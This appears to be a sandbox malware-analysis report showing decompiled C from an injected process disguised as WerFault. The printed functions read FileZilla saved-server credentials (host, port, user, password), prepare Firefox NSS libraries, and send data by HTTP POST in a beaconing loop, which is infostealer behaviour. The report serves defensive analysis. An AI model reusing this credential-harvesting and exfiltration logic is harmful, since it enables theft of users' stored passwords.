                        Similarity
                        • API ID: InformationThread
                        • String ID:
                        • API String ID: 4046476035-0
                        • Opcode ID: 9f93ec9b1e36b0822b43437e93d58f3719a896f156123009e9e3327c01a109b4
                        • Instruction ID: 68b21e760adcf89b695dcca7553928a95122ebd25f519ebb0e96861db121d8a9
                        • Opcode Fuzzy Hash: 9f93ec9b1e36b0822b43437e93d58f3719a896f156123009e9e3327c01a109b4
                        • Instruction Fuzzy Hash: 95E05B79311209FFEB298B74DC0AFAF76AC9B01754F5082757612D50E0D774CB50DA50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02880E92() {
                        				void* _t12;
                        
                        				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
                        					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
                        				}
                        				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
                        					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
                        				}
                        				if( *(_t12 - 0x14) != 0) {
                        					NtClose( *(_t12 - 0x14)); // executed
                        				}
                        				return 0;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: fc381945dc204cddcdb2922191d9ee64660affaca0beca05053826328c03b72a
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: fc381945dc204cddcdb2922191d9ee64660affaca0beca05053826328c03b72a
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02880EDD() {
                        				void* _t12;
                        
                        				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
                        					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
                        				}
                        				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
                        					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
                        				}
                        				if( *(_t12 - 0x14) != 0) {
                        					NtClose( *(_t12 - 0x14)); // executed
                        				}
                        				return 0;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: de78f154e5506a4038ecdc154ace678739b201a5cad2f1fbdb887c88a9c41275
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: de78f154e5506a4038ecdc154ace678739b201a5cad2f1fbdb887c88a9c41275
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02880E43() {
                        				void* _t12;
                        
                        				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
                        					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
                        				}
                        				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
                        					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
                        				}
                        				if( *(_t12 - 0x14) != 0) {
                        					NtClose( *(_t12 - 0x14)); // executed
                        				}
                        				return 0;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: 8bd9ab685aae6bf8dca6e55118055723555fb02e9f011c7205344c7a825ab8f5
                        • Instruction ID: 6a042a6c5fa4d2cf0e359c97434d27308b6336a818ebf3d57fd68d7842d84007
                        • Opcode Fuzzy Hash: 8bd9ab685aae6bf8dca6e55118055723555fb02e9f011c7205344c7a825ab8f5
                        • Instruction Fuzzy Hash: D8E0B63D804109EACF667B94C9097EEBBB1AF2535EF288151A125F04E0837506E9DF52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 60%
                        			E0287918E(void* __ecx, intOrPtr* _a4, intOrPtr* _a8) {
                        				char _v5;
                        				char _v6;
                        				struct _SECURITY_ATTRIBUTES* _v12;
                        				struct _SECURITY_ATTRIBUTES* _v16;
                        				struct _SECURITY_ATTRIBUTES* _v20;
                        				char _v24;
                        				struct _SECURITY_ATTRIBUTES* _v28;
                        				struct _SECURITY_ATTRIBUTES* _v32;
                        				signed int _v36;
                        				char _v40;
                        				char _v56;
                        				short _v576;
                        				void* _t92;
                        				intOrPtr _t95;
                        				intOrPtr _t100;
                        				void* _t106;
                        				void* _t107;
                        				void* _t108;
                        				void* _t109;
                        				void* _t116;
                        				short _t123;
                        				void* _t141;
                        				void* _t142;
                        				void* _t143;
                        				struct _SECURITY_ATTRIBUTES* _t144;
                        				short* _t145;
                        				void* _t147;
                        				signed int _t148;
                        				intOrPtr _t150;
                        				void* _t151;
                        
                        				if(_a4 == 0 || _a8 == 0) {
                        					L40:
                        					return 0;
                        				} else {
                        					_v28 = 0;
                        					_v40 = 0;
                        					_v24 = 0;
                        					_v20 = 0;
                        					_v12 = 0;
                        					_v16 = 0;
                        					_v6 = 0;
                        					_v5 = 0;
                        					_t144 = E0286161B(0x4200);
                        					_v32 = _t144;
                        					if(_t144 == 0) {
                        						goto L40;
                        					}
                        					E028614DB(__ecx, _t144, 0, 0x4200);
                        					E028614DB(__ecx,  &_v576, 0, 0x208);
                        					_t131 =  *0x289f2e8 + 0x37e;
                        					if(E028619E8( *0x289f2e8 + 0x37e) == 0) {
                        						L32:
                        						 *0x289f824(_v28);
                        						if(_v12 != 0) {
                        							E028617E4(_v12);
                        						}
                        						_t80 = _v20;
                        						if(_v20 != 0) {
                        							E02861CAF(_t80);
                        						}
                        						if(_v16 != 0) {
                        							L39:
                        							 *_a4 = _v32;
                        							 *_a8 = _v16;
                        							return _v6;
                        						} else {
                        							_t144 = _v32;
                        							L38:
                        							E028617E4(_t144);
                        							_v32 = 0;
                        							goto L39;
                        						}
                        					}
                        					 *0x289fc68( &_v576);
                        					 *0x289f6b4( &_v576, L"FileZilla\\sitemanager.xml");
                        					_t92 = CreateFileW( &_v576, 0x80000000, 1, 0, 4, 0x80, 0); // executed
                        					_v28 = _t92;
                        					if(_t92 == 0xffffffff) {
                        						goto L38;
                        					}
                        					_t147 =  *0x289f778(_t92, 0);
                        					if(_t147 < 0xc) {
                        						goto L32;
                        					}
                        					_t17 = _t147 + 2; // 0x2
                        					_t95 = E0286161B(_t17);
                        					_v12 = _t95;
                        					if(_t95 == 0) {
                        						goto L32;
                        					}
                        					_push(0);
                        					_push( &_v40);
                        					_push(_t147);
                        					_push(_v12);
                        					_push(_v28);
                        					if( *0x289f78c() == 0) {
                        						goto L32;
                        					}
                        					E02861869(_t97, _v12, 0xd, 0xa);
                        					_t100 = E02861B93(_t131, _v12, 0x2895388,  &_v24);
                        					_v20 = _t100;
                        					if(_t100 != 0 && _v24 != 0) {
                        						_t148 = 0;
                        						_v36 = 0;
                        						if(_v24 > 0) {
                        							_t145 = _t144 + 0x20c;
                        							do {
                        								E028614DB(_t131,  &_v56, 0, 0x10);
                        								if(_v5 != 0) {
                        									L15:
                        									if(_v5 != 1) {
                        										goto L29;
                        									}
                        									_t150 =  *((intOrPtr*)(_v20 + _t148 * 4));
                        									if(E02861EE5(_t150, "<Server>") < 0) {
                        										_t131 = _t150;
                        										if(E028619D6(_t150) <= 8) {
                        											goto L29;
                        										}
                        										_t106 = E02861EE5(_t150, "<Host>");
                        										if(_t106 < 0) {
                        											_t107 = E02861EE5(_t150, "<Port>");
                        											if(_t107 < 0) {
                        												_t108 = E02861EE5(_t150, "<User>");
                        												if(_t108 < 0) {
                        													_t109 = E02861EE5(_t150, "<Pass>");
                        													if(_t109 >= 0) {
                        														_t51 = _t109 + 6; // 0x6
                        														_t141 = _t150 + _t51;
                        														_t52 = _t145 - 0x184; // -912
                        														 *0x289f6a0(_t52, _t141, E02862082(_t141));
                        														 *((short*)(_t145 - 0x20c)) = 0x210;
                        														 *((intOrPtr*)(_t145 - 0x208)) = 3;
                        														 *((short*)(_t145 - 0x20a)) = 0;
                        													}
                        													goto L29;
                        												}
                        												_t48 = _t108 + 6; // 0x6
                        												_t142 = _t150 + _t48;
                        												_push(E02862082(_t142));
                        												_t49 = _t145 - 0x204; // -1040
                        												_t116 = _t49;
                        												L26:
                        												 *0x289f6a0(_t116, _t142);
                        												goto L29;
                        											}
                        											_t44 = _t107 + 6; // 0x6
                        											_t143 = _t150 + _t44;
                        											 *0x289f6a0( &_v56, _t143, E02862082(_t143));
                        											_t151 = E0286171C( &_v56);
                        											if(_t151 != 0) {
                        												_t123 =  *0x289f64c();
                        												_t131 = _t151;
                        												 *_t145 = _t123;
                        												E028617E4(_t151);
                        											}
                        											goto L29;
                        										}
                        										_t41 = _t106 + 6; // 0x6
                        										_t142 = _t150 + _t41;
                        										_push(E02862082(_t142));
                        										_t42 = _t145 - 0x104; // -784
                        										_t116 = _t42;
                        										goto L26;
                        									}
                        									_v16 = _v16 + 1;
                        									_t145 = _t145 + 0x210;
                        									goto L29;
                        								}
                        								if(E02861EE5( *((intOrPtr*)(_v20 + _t148 * 4)), "FileZi") != 0) {
                        									_v5 = 1;
                        									goto L15;
                        								}
                        								L29:
                        								_t148 = _v36 + 1;
                        								_v36 = _t148;
                        							} while (_t148 < _v24);
                        							if(_v16 != 0) {
                        								_v6 = 1;
                        							}
                        						}
                        					}
                        					goto L32;
                        				}
                        			}

                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 02879247
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFile
                        • String ID: <Host>$<Pass>$<Port>$<Server>$<User>$FileZi$FileZilla\sitemanager.xml
                        • API String ID: 823142352-2360068268
                        • Opcode ID: 3dcbcc123276fe934b913157439d5d5a0bb75c20991626c6dcbbb57e370cdbca
                        • Instruction ID: c9488f11d503500592a2af89563b9910862ea42a7f9d54508354243cc36b16f8
                        • Opcode Fuzzy Hash: 3dcbcc123276fe934b913157439d5d5a0bb75c20991626c6dcbbb57e370cdbca
                        • Instruction Fuzzy Hash: 9A81A47DD00219ABDF11EFE8C888AAEB7B9AF04304F548466E509F7241D774DA45CF62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 63%
                        			E02889FE6(void* __ecx, void* __edx) {
                        				char _v5;
                        				signed int _v12;
                        				signed int _v16;
                        				void* __edi;
                        				void* __esi;
                        				void* _t33;
                        				intOrPtr _t35;
                        				void* _t41;
                        				signed int _t42;
                        				void* _t44;
                        				void* _t47;
                        				void* _t49;
                        				void* _t52;
                        				void* _t55;
                        
                        				_t47 = __ecx;
                        				_v12 = _v12 & 0x00000000;
                        				_v16 = _v16 & 0x00000000;
                        				_v5 = 0;
                        				Sleep(0x9c4); // executed
                        				E02864C5D(_t47, _v16, 0xffffffff); // executed
                        				 *0x289f968( *0x289ec4a, 0x4d2, _t49, _t52, _t44);
                        				while(1) {
                        					Sleep(0x64); // executed
                        					if( *0x289fd9c == 0) {
                        						break;
                        					}
                        					if(E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff) != 0 || _v12 != 0) {
                        						L6:
                        						E0288A7AF( *0x289f2e8 + 0x2376); // executed
                        						E0288A294(); // executed
                        						E0288A20E();
                        						_t33 = E0286D774( *( *0x289f2e8 + 4) & 0x0000ffff);
                        						__eflags = _t33;
                        						if(_t33 == 0) {
                        							__eflags = _v16 - 0x80;
                        							if(_v16 < 0x80) {
                        								_t41 = E0288A15C(_t47);
                        								__eflags = _t41 - 1;
                        								if(_t41 == 1) {
                        									_t11 =  &_v16;
                        									 *_t11 = _v16 + 1;
                        									__eflags =  *_t11;
                        								}
                        							}
                        						}
                        						_t55 = E02863287("PRB", 0, 0x47, 1);
                        						__eflags = _t55;
                        						if(_t55 != 0) {
                        							Sleep(0x96); // executed
                        							__eflags = _v5 - 1;
                        							if(_v5 != 1) {
                        								_v5 = 1;
                        							} else {
                        								E0288A45C(); // executed
                        								E028834CF(0x96, _t55); // executed
                        								Sleep(0x96); // executed
                        								_v5 = 0;
                        							}
                        							Sleep(0x14); // executed
                        							FindCloseChangeNotification(_t55); // executed
                        						}
                        						goto L15;
                        					} else {
                        						_t42 = E02863287("EP91", 0, 0x43, 1);
                        						_v12 = _t42;
                        						if(_t42 != 0) {
                        							goto L6;
                        						} else {
                        							 *0x289f90c(0x3e8);
                        							L15:
                        							_t35 =  *0x289fdb0;
                        							if(_t35 != 0 &&  *0x289fd9c != 0) {
                        								_push(0xc8);
                        								_push(_t35);
                        								if( *0x289f8a4() != 0x102) {
                        									break;
                        								}
                        								_push(0x9c4);
                        								_push( *0x289fd9c);
                        								if( *0x289f8a4() == 0x102) {
                        									continue;
                        								}
                        							}
                        							break;
                        						}
                        					}
                        				}
                        				if(_v12 != 0) {
                        					 *0x289f824(_v12);
                        				}
                        				return 1;
                        			}

                        APIs
                        • Sleep.KERNEL32(000009C4), ref: 0288A001
                        • Sleep.KERNEL32(00000064), ref: 0288A026
                        • Sleep.KERNEL32(00000096,PRB,00000000,00000047,00000001,?,?,?), ref: 0288A0D0
                        • Sleep.KERNEL32(00000096), ref: 0288A0E7
                        • Sleep.KERNEL32(00000014), ref: 0288A0F9
                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 0288A100
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$ChangeCloseFindNotification
                        • String ID: EP91$PRB
                        • API String ID: 1808342102-3406640311
                        • Opcode ID: b842c6c88c018274f7a3fd1baba42f1d41c7ab4a261eb65a73b4146cda96a2c4
                        • Instruction ID: 9c5e36412a4d7195a504454ba5a661a93c2a07a357052837771623ab2f230709
                        • Opcode Fuzzy Hash: b842c6c88c018274f7a3fd1baba42f1d41c7ab4a261eb65a73b4146cda96a2c4
                        • Instruction Fuzzy Hash: 8631F33CD81204FBEB297BA8D848B6D7BB5AF24B16F188452F606E60C0C7754495CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 703 2866202-2866229 704 2866238-286623f 703->704 705 2866253-2866278 call 2885150 * 2 704->705 706 2866241-2866251 704->706 712 2866283-2866285 705->712 713 286627a-2866281 705->713 706->704 715 28664bc-28664be 712->715 713->712 714 286628a-28662c3 call 2884f0a call 2866194 713->714 720 28662c5-28662c7 714->720 721 28662cc-2866305 call 2884f0a call 2866194 714->721 720->715 726 2866307-2866309 721->726 727 286630e-2866323 SetErrorMode 721->727 726->715 728 2866332-2866339 727->728 729 2866422-2866453 call 28664bf call 2861807 728->729 730 286633f-286636e call 286171c 728->730 751 28664a6-28664ba call 2878f6f call 2878f00 729->751 752 2866455-2866469 729->752 735 2866374-286638d LoadLibraryW 730->735 736 286640a 730->736 739 2866395-28663bf call 2884f0a 735->739 740 286638f-2866393 735->740 738 286640e-2866414 736->738 742 2866416-2866418 738->742 743 286641d 738->743 749 28663c4-28663f7 call 2866194 739->749 744 28663fd-2866408 call 28617e4 740->744 742->715 743->728 744->738 749->744 757 28663f9 749->757 751->715 752->751 760 286646b-2866470 752->760 757->744 762 2866479-286647b 760->762 762->751 763 286647d-286648a 762->763 763->751 765 286648c-2866499 763->765 765->751 767 286649b 765->767 767->751
                        C-Code - Quality: 56%
                        			E02866202(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v13;
                        				signed int _v20;
                        				char _v540;
                        				signed int _v544;
                        				signed int _v548;
                        				WCHAR* _v552;
                        				signed int _v556;
                        				signed int _v560;
                        				intOrPtr _v564;
                        				intOrPtr _v568;
                        				void* __edi;
                        				void* _t85;
                        				struct HINSTANCE__* _t97;
                        				signed int _t100;
                        
                        				_v568 = __ecx;
                        				_v13 = 1;
                        				_v20 = _v20 & 0x00000000;
                        				_v12 = _v12 & 0x00000000;
                        				_v8 = _v8 & 0x00000000;
                        				_v544 = _v544 & 0x00000000;
                        				L2:
                        				if(_v544 < 0xe) {
                        					 *(0x2899648 + _v544 * 0x28) =  *(0x2899648 + _v544 * 0x28) & 0x00000000;
                        					_v544 = _v544 + 1;
                        					goto L2;
                        				}
                        				 *0x2899648 = E02885150(0x2899628);
                        				 *0x2899670 = E02885150(0x2899650);
                        				if( *0x2899648 == 0 ||  *0x2899670 == 0) {
                        					return 0;
                        				}
                        				_v12 = E02884F0A(0x2899628, 0, 0x2899858, 0x20a);
                        				_v20 = E02866194(_t67, _v568, 0, 0x2899858, 0x20a);
                        				if(_v12 >= _v20) {
                        					_v12 = E02884F0A(0x2899628, 1, 0x2899858, 0x20a);
                        					_v20 = E02866194(_t70, _v568, 1, 0x2899858, 0x20a);
                        					if(_v12 >= _v20) {
                        						SetErrorMode(0x8007); // executed
                        						_v548 = 2;
                        						while(_v548 < 0xe) {
                        							_v560 = _v560 & 0x00000000;
                        							_v556 = _v556 & 0x00000000;
                        							_v552 = E0286171C(0x2899628 + _v548 * 0x28);
                        							if(_v552 == 0) {
                        								_v13 = 0;
                        								L21:
                        								if((_v13 & 0x000000ff) != 0) {
                        									_v548 = _v548 + 1;
                        									continue;
                        								}
                        								return 0;
                        							}
                        							_t97 = LoadLibraryW(_v552); // executed
                        							_v556 = _t97;
                        							if(_v556 != 0) {
                        								 *(0x2899648 + _v548 * 0x28) = _v556;
                        								_t100 = E02884F0A(0x2899628, _v548, 0x2899858, 0x20a); // executed
                        								_v560 = _t100;
                        								_v564 = E02866194(_t100, _v568, _v548, 0x2899858, 0x20a);
                        								if(_v560 < _v564) {
                        									_v13 = 0;
                        								}
                        							} else {
                        								_v13 = 0;
                        							}
                        							E028617E4(_v552);
                        							goto L21;
                        						}
                        						E028664BF(0x289f530); // executed
                        						E02861807( &_v540, 0x208);
                        						_push(0x103);
                        						_push( &_v540);
                        						_push(0);
                        						if( *0x289f8c8() != 0) {
                        							_v8 =  *0x289fc64( &_v540);
                        							if(_v8 != 0) {
                        								_t85 =  *0x289f69c(_v8, L"firefox.exe"); // executed
                        								if(_t85 == 0) {
                        									_push("nspr4.dll");
                        									if( *0x289f8cc() == 0) {
                        										_push("nspr4.dll");
                        										if( *0x289f914() == 0) {
                        											 *0x289f914("nss3.dll");
                        										}
                        									}
                        								}
                        							}
                        						}
                        						E02878F6F();
                        						E02878F00(0x289f530);
                        						 *((char*)(_v568 + 1)) = 1;
                        						return 1;
                        					}
                        					return 0;
                        				} else {
                        					return 0;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: firefox.exe$kernel32.dll$nspr4.dll$nss3.dll$ntdll.dll
                        • API String ID: 0-373526193
                        • Opcode ID: 9ba848620035767184ef56f84d8acc750a9fa346f6b895351893ea0e4b3e0b2d
                        • Instruction ID: 52b37458b9a50a3a41dead66c2e08f92523b987e22dbc8cd26be2b07214d1da2
                        • Opcode Fuzzy Hash: 9ba848620035767184ef56f84d8acc750a9fa346f6b895351893ea0e4b3e0b2d
                        • Instruction Fuzzy Hash: 87616F7CE413A8AFEF10AFA4DC8DBADB7B5AB14305F0844D9D109E6281E7784A85CF01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1132 287abcb-287abe2 1133 287af1b 1132->1133 1134 287abe8-287abf0 1132->1134 1136 287af1d-287af21 1133->1136 1134->1133 1135 287abf6-287abfc 1134->1135 1135->1133 1137 287ac02-287ac2d 1135->1137 1138 287ac36-287ac80 call 287b4a9 1137->1138 1139 287ac2f 1137->1139 1138->1133 1144 287ac86-287ac8d 1138->1144 1139->1138 1145 287ac95-287acc7 call 28619d6 call 28747e9 1144->1145 1146 287ac8f-287ac90 call 287ab6a 1144->1146 1153 287acce 1145->1153 1154 287acc9-287accc 1145->1154 1146->1145 1155 287acd8-287acee call 287b56d 1153->1155 1154->1155 1158 287acf4-287acfe call 28619d6 1155->1158 1159 287adbe-287adc6 1155->1159 1164 287adb6-287adb9 call 28617e4 1158->1164 1165 287ad04-287ad08 1158->1165 1160 287adcf-287add9 1159->1160 1161 287adc8 1159->1161 1160->1136 1161->1160 1164->1159 1165->1164 1166 287ad0e-287ad2e call 28619d6 HttpSendRequestA 1165->1166 1170 287ad77-287ad7a 1166->1170 1171 287ad30-287ad37 1166->1171 1172 287aee5-287aef0 1170->1172 1173 287ad80-287ad9d 1170->1173 1171->1172 1174 287ad3d-287ad4a call 287ab2c 1171->1174 1180 287aef2-287aef9 1172->1180 1181 287aefe-287af03 1172->1181 1178 287adf0-287adfd call 287be88 1173->1178 1179 287ad9f-287adaa 1173->1179 1174->1172 1191 287ad50-287ad6b call 287ab6a call 28619d6 1174->1191 1178->1164 1193 287adff-287ae23 call 286161b 1178->1193 1184 287adde-287ade5 1179->1184 1185 287adac 1179->1185 1180->1164 1186 287adb2 1181->1186 1187 287af09-287af0c 1181->1187 1184->1178 1192 287ade7-287adee 1184->1192 1185->1186 1186->1164 1187->1186 1190 287af12-287af16 1187->1190 1190->1164 1191->1170 1192->1164 1192->1178 1193->1164 1199 287ae25-287ae41 1193->1199 1202 287ae43-287ae48 1199->1202 1203 287ae6d-287ae76 1199->1203 1202->1203 1204 287ae4a-287ae56 1202->1204 1208 287ae98-287ae9c 1203->1208 1209 287ae78-287ae7c 1203->1209 1206 287ae67-287ae6b 1204->1206 1207 287ae58-287ae65 call 28617b4 1204->1207 1206->1199 1207->1206 1207->1208 1212 287ae9e-287aec7 call 2875882 call 287aa2a 1208->1212 1213 287aed9 1208->1213 1209->1208 1211 287ae7e-287ae96 call 28617b4 1209->1211 1211->1199 1211->1208 1212->1213 1225 287aec9-287aed7 call 287afa1 1212->1225 1215 287aeda-287aee0 call 28617e4 1213->1215 1215->1164 1225->1215
                        C-Code - Quality: 47%
                        			E0287ABCB(void* __ecx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				void* _v48;
                        				char _v316;
                        				void* __ebx;
                        				void* __edi;
                        				void* _t108;
                        				void* _t109;
                        				int _t115;
                        				void* _t116;
                        				intOrPtr _t129;
                        				signed int _t138;
                        				char _t146;
                        				void* _t147;
                        				void* _t148;
                        				char* _t158;
                        				void* _t159;
                        				char* _t161;
                        				void* _t162;
                        				void* _t163;
                        
                        				_t150 = __ecx;
                        				_t163 = __ecx;
                        				if( *((intOrPtr*)(__ecx + 0x64)) != 0xc0 ||  *((intOrPtr*)(__ecx + 0x124)) == 0 ||  *((intOrPtr*)(__ecx + 0x128)) == 0) {
                        					L49:
                        					return 0;
                        				} else {
                        					_t146 = 4;
                        					_v16 = 0;
                        					_v28 = 1;
                        					_v20 = 0;
                        					_v36 = _t146;
                        					_v44 = 0;
                        					_v40 = 0x1234;
                        					_v12 = 0x80080200;
                        					if(( *(__ecx + 0x82) & 0x00000001) != 0) {
                        						_v12 = 0x80883200;
                        					}
                        					_t158 =  &_v316;
                        					E0287B4A9(_t150, _t158, _t163);
                        					 *0x289fbc4( *((intOrPtr*)(_t163 + 0x128)), 0x4d,  &_v28, _t146);
                        					_t159 =  *0x289fc18( *((intOrPtr*)(_t163 + 0x128)), "POST", _t158, "HTTP/1.1", 0, 0, _v12,  &_v40);
                        					_v12 = _t159;
                        					if(_t159 == 0) {
                        						goto L49;
                        					} else {
                        						if(( *(_t163 + 0x82) & 0x00000001) != 0) {
                        							E0287AB6A(_t150, _t159);
                        						}
                        						 *(_t163 + 0x12c) = _t159;
                        						_v28 = 1;
                        						 *0x289fbc4(_t159, 0x4d,  &_v28, _t146);
                        						_t157 = _t163 + 0x8a;
                        						_t151 = _t163 + 0x8a;
                        						if(E028747E9(_t157, E028619D6(_t163 + 0x8a)) ==  *((intOrPtr*)(_t163 + 0x72))) {
                        							 *((intOrPtr*)(_t163 + 0x130)) = 1;
                        						} else {
                        							 *((intOrPtr*)(_t163 + 8)) = _t146;
                        						}
                        						_v8 = _v8 & 0x00000000;
                        						_t108 = E0287B56D(_t151, _t163,  &_v8); // executed
                        						_t147 = _t108;
                        						_v48 = _t147;
                        						if(_t147 == 0) {
                        							L24:
                        							_t109 =  *(_t163 + 0x12c);
                        							if(_t109 != 0) {
                        								 *0x289fbb8(_t109);
                        							}
                        							 *(_t163 + 0x12c) =  *(_t163 + 0x12c) & 0x00000000;
                        							return _v16;
                        						} else {
                        							if(E028619D6(_t147) < 1 || _v8 == 0) {
                        								L23:
                        								E028617E4(_v48);
                        								goto L24;
                        							} else {
                        								_t161 = "Content-Type: application/x-www-form-urlencoded";
                        								_t153 = _t161;
                        								_t115 = HttpSendRequestA( *(_t163 + 0x12c), _t161, E028619D6(_t161), _t147, _v8); // executed
                        								if(_t115 != 0) {
                        									L18:
                        									if(_t115 != 1) {
                        										L44:
                        										_t116 =  *0x289f884();
                        										if(_t116 != 0x2ee7) {
                        											if(_t116 == 0x2efd || _t116 == 2) {
                        												L22:
                        												_v16 = _v16 | 0xffffffff;
                        											} else {
                        												_v16 = _v16 & 0x00000000;
                        											}
                        											goto L23;
                        										}
                        										_v16 = 0xfffffffd;
                        										goto L23;
                        									}
                        									_push( &_v44);
                        									_push( &_v36);
                        									_push( &_v20);
                        									_push(0x20000013);
                        									_push(_v12);
                        									if( *0x289fc08() != 1) {
                        										L29:
                        										if(E0287BE88(_t153,  *(_t163 + 0x12c)) == 0) {
                        											goto L23;
                        										}
                        										_v8 = _v8 & 0x00000000;
                        										_v24 = _v24 & 0x00000000;
                        										_v12 = _v12 & 0x00000000;
                        										_t148 = 0x1394;
                        										_v32 = 0x800;
                        										_t162 = E0286161B(0x1394);
                        										if(_t162 == 0) {
                        											goto L23;
                        										} else {
                        											goto L31;
                        										}
                        										while(1) {
                        											L31:
                        											_push( &_v8);
                        											_push(_v32);
                        											_push(_v24 + _t162);
                        											_push( *(_t163 + 0x12c));
                        											if( *0x289fbe4() != 1) {
                        												break;
                        											}
                        											_t138 = _v8;
                        											if(_t138 == 0) {
                        												break;
                        											}
                        											_v24 = _v24 + _t138;
                        											_t76 = _t148 - 0x801; // 0xb93
                        											if(_v24 < _t76) {
                        												L35:
                        												_v8 = _v8 & 0x00000000;
                        												continue;
                        											}
                        											_t148 = _t148 + _t148;
                        											_t162 = E028617B4(_t162, _t148);
                        											if(_t162 == 0) {
                        												L39:
                        												if(_v24 < 0x5d) {
                        													L42:
                        													L43:
                        													E028617E4(_t162);
                        													goto L23;
                        												}
                        												_t129 =  *0x289f908();
                        												_t154 =  *0x289f2e8;
                        												 *((intOrPtr*)( *0x289f2e8 + 0x3a)) = _t129;
                        												E02875882(_t154 + 0x36);
                        												E0287AA2A(_t162, _t154 + 0x36, _t163 + 0x112);
                        												if( *((intOrPtr*)(_t162 + 8)) != 0x5c) {
                        													goto L42;
                        												}
                        												_v16 = E0287AFA1(_t163, _t162, _v24);
                        												goto L43;
